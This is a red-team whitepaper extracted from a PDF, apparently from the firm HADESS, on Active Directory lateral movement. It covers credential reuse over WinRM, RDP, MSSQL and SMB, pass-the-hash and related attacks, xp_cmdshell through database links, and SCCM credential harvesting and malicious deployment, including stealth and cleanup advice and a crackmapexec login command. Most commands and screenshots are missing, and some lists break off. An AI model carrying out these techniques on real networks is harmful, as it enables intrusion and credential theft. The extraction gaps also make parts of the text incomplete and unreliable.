Lateral Movement
Lateral Movement
HADESS WWW.HADESS.IO
Introduction
In the realm of cybersecurity, the concept of lateral movement has become a critical focal point
for defenders and attackers alike. As organizations fortify their defenses against external
threats, adversaries seek alternative routes to infiltrate networks and systems. This intricate
dance of offense and defense unfolds within the domain of lateral movement, where attackers
leverage various techniques to navigate through a network once initial access has been
achieved.
One of the fundamental pillars of lateral movement is the exploitation of passwords. Whether
through brute-force attacks, password spraying, or the exploitation of weak credentials,
attackers exploit the vulnerabilities inherent in password-based authentication systems.
Password A represents not just a string of characters, but often a gateway to deeper network
access and control.
The exploitation of SMB (Server Message Block) protocol vulnerabilities is another avenue for
lateral movement. By leveraging SMB vulnerabilities, attackers can gain unauthorized access to
shared resources and execute commands on remote systems, effectively expanding their reach
within the network.
Kerberos-related techniques, such as Pass the Ticket and Pass the Certificate, exploit
weaknesses in authentication mechanisms to move laterally within a network. These techniques
capitalize on trust relationships and cryptographic vulnerabilities to bypass security controls.
Additionally, attackers exploit weaknesses in enterprise systems such as WSUS (Windows Server
Update Services) and SCCM (System Center Configuration Manager) to further their lateral
movement efforts. By compromising these systems, attackers can manipulate software
deployment processes, harvest credentials, and establish persistent access within the network.
In the complex landscape of lateral movement, defenders must remain vigilant, continuously
adapting their strategies to detect and mitigate evolving threats. By understanding the
techniques employed by attackers and implementing robust security measures, organizations
can defend against the persistent threat of lateral movement and safeguard their critical assets.
To be the vanguard of cybersecurity, Hadess envisions a world where digital assets are safeguarded from malicious actors. We strive to create a secure digital ecosystem, where
businesses and individuals can thrive with confidence, knowing that their data is protected. Through relentless innovation and unwavering dedication, we aim to establish Hadess as a
symbol of trust, resilience, and retribution in the fight against cyber threats.
Document info
HADESS
To be the vanguard of cybersecurity, Hadess envisions a world where digital assets are
safeguarded from malicious actors. We strive to create a secure digital ecosystem, where
businesses and individuals can thrive with confidence, knowing that their data is protected.
Through relentless innovation and unwavering dedication, we aim to establish Hadess as a
symbol of trust, resilience, and retribution in the fight against cyber threats.
At Hadess, our mission is twofold: to unleash the power of white hat hacking in punishing black
hat hackers and to fortify the digital defenses of our clients. We are committed to employing our
elite team of expert cybersecurity professionals to identify, neutralize, and bring to justice those
who seek to exploit vulnerabilities. Simultaneously, we provide comprehensive solutions and
services to protect our client's digital assets, ensuring their resilience against cyber attacks. With
an unwavering focus on integrity, innovation, and client satisfaction, we strive to be the guardian
of trust and security in the digital realm.
Security Researcher
Amir Gholizadeh (@arimaqz), Surya Dev Singh (@kryolite_secure)
Key Findings
HADESS.IO
Attacks
HADESS.IO Pwning the Domain: Lateral Movement
Lateral movement in red teaming is all about moving between targets in the environment to reach the objective.
Password
When you find a password you can pass it to different services to check if you can get it. In this article we’ll be going
through a few of them.
WinRM
WinRM is a management protocol used to remotely communicate with another system in the Windows realm. You can pass
the password to this service to gain access if it’s enabled:
In this scenario we have a password which we passed to WinRM using the ‘evil-winrm’ tool.
RDP
RDP is a protocol to remotely control desktop computers. Once again we can pass our password to this service if enabled:
In this scenario we’ve used ‘xfreerdp’ to talk with the RDP protocol and gained access to the system through a graphical
interface.
HADESS.IO Pwning the Domain: Lateral Movement
MSSQL
We can also pass the password to MSSQL service if enabled and authorized to exfiltrate sensitive information out of the
network or to execute OS commands. To check if MSSQL is enabled on the target system:
crackmapexec mssql 192.168.100.100 -u 'matrix\administrator' -p 'P@$$W0rd'
SMB
SMB is a file sharing protocol widely used in the Windows realm. To check if authorized:
And finally to connect to the target share which in our case is ‘Users’:
HADESS.IO Pwning the Domain: Lateral Movement
Interactive-shell
There are many tools developed that enable us to get an interactive-shell by abusing protocols such as SMB. ‘psexec’
from ‘impacke’t is one of the popular tools used to get a shell:
As you can see it finds a writable share and uploads a file, then creates a service and starts it to execute the file giving us
‘nt authority\system’ access to the system.
There are also other tools that can do magic like that:
And ‘wmiexec’:
HADESS.IO Pwning the Domain: Lateral Movement
NTHash
NTLMv1, NTLMv2 and NThash are all confusing terms and used interchangeably but let’s settle this once and for all:
NTHash: this is the hash of the password stored in the system in SAM hive and in active directory networks in the
NTDS file.
NTLMv1: this is a challenge/response protocol to authenticate to a system using the NTHash.
NTLMv2: this is the newer version of the NTLM protocol with some adjustments but the same concept.
Pass-the-Hash
PtH or Pass-the-Hash attack is an attack where the attacker passes NTHash to systems instead of passwords. Remember
NTLM? We as an end user type our password and let the system send it through a hashing algorithm to become NTHash
and then send that to NTLM to authenticate us to the target system. Now in PtH, instead of typing the password and
letting the system make a hash out of it for us, we pass the already found NThash, skipping those steps before
authentication.
Overpass-the-Hash
PtH is good and all, but what if we want to pass a ticket instead of a hash? Well by having a NTHash, we can request a TGT
for ourselves and pass that which is just what Overpass-the-Hash is all about.
Pass-the-Key
In Kerberos authentication, we can provide 5 types of keys. 4 symmetric keys:
MSSQL
Execute OS Commands
The `xp_cmdshell` procedure can be used to execute shell commands on the SQL server if you have **sysadmin
privileges**. `Invoke-SQLOSCmd` cmdlets from `PowerUpSQL` provides a simple mean of using it.
HADESS.IO Pwning the Domain: Lateral Movement
If a user has privileges to access MSSQL instances, he could be able to use it to execute commands in the MSSQL host (if
running as SA). Also, if a MSSQL
instance is trusted (database link) by a different MSSQL instance.
If the user has privileges over the trusted database, he is going to be able to use the
trust relationship to execute queries also in the other instance. This trusts can
be chained and at some point the user might be able to find some misconfigured
database where he can execute commands or stored procedures. Database links
work even across forest trust.
HADESS.IO Pwning the Domain: Lateral Movement
HADESS.IO Pwning the Domain: Lateral Movement
Credential Harvest
The **credential harvesting** can be used for lateral movement and privilege escalation. The Credential harvesting
includes all the ways that could permit to retrieve SCCM related credentials in the environment. Most commonly you can
harvest SCCM credentials within these three locations:
- Locally on an SCCM (Windows) client. Most commonly stored in the WMI database or cached in the CIM store and some
might also appear in SCCM Log Files.
- Locally on an SCCM member server, where the SCCM Management Point (MP) usually hosts the biggest pot of gold
- Stored in Policy definitions that can be remotely fetched from Management Points.
NAA doesn't need to be privileged on the domain, but it can happen that administrators give too many privileges to these
accounts.
**It is worth to note that, even after deleting or changing the NAA in the SCCM configuration, the binary file still contains
the encrypted credentials on the enrolled computers.**
Here are all the ways to extract SCCM credentials using NAA :
HADESS.IO Pwning the Domain: Lateral Movement
Now we can use these account to coercing it to authenticate with our machine. We can then either crack those hashes to
harvest creds or relay this authentication onto other devices to move laterally. The main requirement of this is Client
Push Account needs to have local admin on all clients to works.
Note that we get both the machine account and the Client Push account. Password cracking can be attempted using
mode 5600 in `hashcat`.
HADESS.IO Pwning the Domain: Lateral Movement
Few things to take into consideration while deploying the script or application.
- Make a plan what script you want to deploy and where , you wont be spraying all the payload on all the client machine.
- Try to add you target to one collection and then try to deploy your malicious script on that collection.
- You should ensure you have sufficient administrative privileges to create device collection, add device and creating
application and deployment of them.
- Cleanup: You want to cleanup all your steps (delete application, delete created device collection) after your exploit
attempt
For exploiting we can use **SharSCCM** again, Here are the step by step guide to deploy our malicious Script /
Application in SCCM Environment :
Now from the Output Note down the device's resource name or resource id (`ResourceName: XXX`, `ResourceID: XXXX`).
we will use **ResourceID** for exploitation.
instead application to deploy to the target machine , we will just trigger an install from a remote UNC Path in order to
capture or relay an incoming NTLM authentication. because its more stealthier , target device is more likely support
NTLM and most important is that we can capture the NTLM hashes of the user account that are logged on the client or
machine account (we can choose)
we can do so , very easily via SharSCCM.exe . since we already have RID (resource id) of the target we want to deploy
script on. We can use the following command :
HADESS.IO Pwning the Domain: Lateral Movement
This will relay the authentication credential or we can capture the NTLM hash via `Pcredz` by running it simultaneously or
move laterally within network by relaying the Hashes.
Also note that we've chosen to execute the deployment in the context of the logged-on user. we can trigger the
deployment using the target device's computer account use the flag `-s` or `--run-as-system`
Conclusion
In conclusion, the exploration of lateral movement techniques reveals the multifaceted nature of
cyber threats and the sophisticated tactics employed by adversaries to navigate through
networks. Techniques such as Password A, Pass the Hash, and Pass the Ticket highlight the
vulnerabilities inherent in authentication mechanisms, while protocols like WinRM, RDP, and
MSSQL serve as conduits for remote access to systems. Additionally, attackers exploit weaknesses
in SMB protocol and utilize interactive-shell techniques to further infiltrate networks and execute
arbitrary commands. The manipulation of enterprise systems such as WSUS and SCCM
underscores the importance of securing software deployment processes and safeguarding
credentials.
Overall, the study of lateral movement underscores the dynamic nature of cyber threats, with
attackers continuously evolving their tactics to bypass security measures and maintain access
within compromised networks. Defenders must remain vigilant, staying abreast of the latest
trends in lateral movement and implementing robust security measures to mitigate the risk of
unauthorized access and data exploitation. By adopting proactive defense strategies and fostering
a culture of cybersecurity awareness, organizations can better protect their critical assets and
mitigate the impact of cyber threats in the ever-changing landscape of cybersecurity.
HADESS
cat ~/.hadess
Website: Email
WWW.HADESS.IO [email protected]
To be the vanguard of cybersecurity, Hadess envisions a world where digital assets are safeguarded from malicious actors. We strive to create a secure digital ecosystem, where
businesses and individuals can thrive with confidence, knowing that their data is protected. Through relentless innovation and unwavering dedication, we aim to establish Hadess as a
symbol of trust, resilience, and retribution in the fight against cyber threats.